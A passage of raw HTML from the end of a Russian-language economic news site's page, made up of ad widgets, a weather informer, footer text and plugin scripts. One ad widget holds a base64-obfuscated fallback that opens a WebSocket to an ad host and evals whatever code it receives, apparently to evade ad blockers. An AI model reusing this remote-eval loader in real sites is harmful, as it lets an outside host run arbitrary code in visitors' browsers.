href="https://enovosty.com/news_technology/full/801-bolee-50-istrebitelej-f-35-prinyali-uchastie-v-slonovej-progulke-foto">Более 50 истребителей F-35 приняли участие в "Слоновьей прогулке" (ФОТО) (8069)</a></p></div></div></div><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><div id="riainfo_015d2e7c4ce2cda608aa710275088255" onclick="trackOutboundLink(this, 'DomRia', 'dom.ria.com');"></div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div></br><div><a href="https://enovosty.com/politika/full/1212-trudovoj-kodeks-ogoltelyx-libertariancev" target="_blank"><img alt="Трудовой кодекс" src="https://enovosty.com/wp-content/themes/eizvestia/img/Liber.jpg"></a></div></br><br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"><div id="cityLink"><a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"><img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"></a></div><div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"><img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td></tr> </table></div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="adpartner-jsunit-4125"><script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><br><div id="help" style="margin-bottom: 15px;"><a href="https://ubb.org.ua/uk/project/5571/" target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/Dopomoga1.jpg" alt="help"></a></div><br><div id="bn77"></div> <script> (function (w, d, n, s, t, j = 0) { function b() { w[n] = w[n] || []; w[n].push(function () { Week.render({ blockId: "77", renderTo: "bn77", async: true }); }); t = d.getElementsByTagName("script")[0]; s = d.createElement("script"); s.type = "text/javascript"; s.src = "https://ext.week.news/wl.js"; s.async = true; t.parentNode.insertBefore(s, t); s.onerror = function () { j++; s.parentNode.removeChild(s); if (j <= 10) setTimeout(b, 100); }; } b(); }) (this, this.document, 'weekCallbacks'); </script><br><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="300-290"></div><script type="text/javascript">new MTr('300-290', {site:907,format:0});</script><div id="lastafisha" class="slide" style="width:240px;margin:auto;"></div> </br></br><a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4789439"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript'>
var pollsL10n = {"ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","text_wait":"\u0412\u0430\u0448 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f. \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043f\u043e\u0434\u043e\u0436\u0434\u0438\u0442\u0435\u2026","text_valid":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0432\u044b\u0431\u0435\u0440\u0438\u0442\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043e\u0442\u0432\u0435\u0442\u0430.","text_multiple":"\u041c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0451\u043d\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u044b\u0431\u0438\u0440\u0430\u0435\u043c\u044b\u0445 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432:","show_loading":"1","show_fading":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/wp-polls/polls.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4789439","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "10f2c2d42e";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div id='admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'></div><script>admixerML.fn.push(function () { admixerML.display('admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'); });</script><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script src="https://affiliate.ria.com/js/ria_informer.js?riacode=015d2e7c4ce2cda608aa710275088255" async></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> </body></html>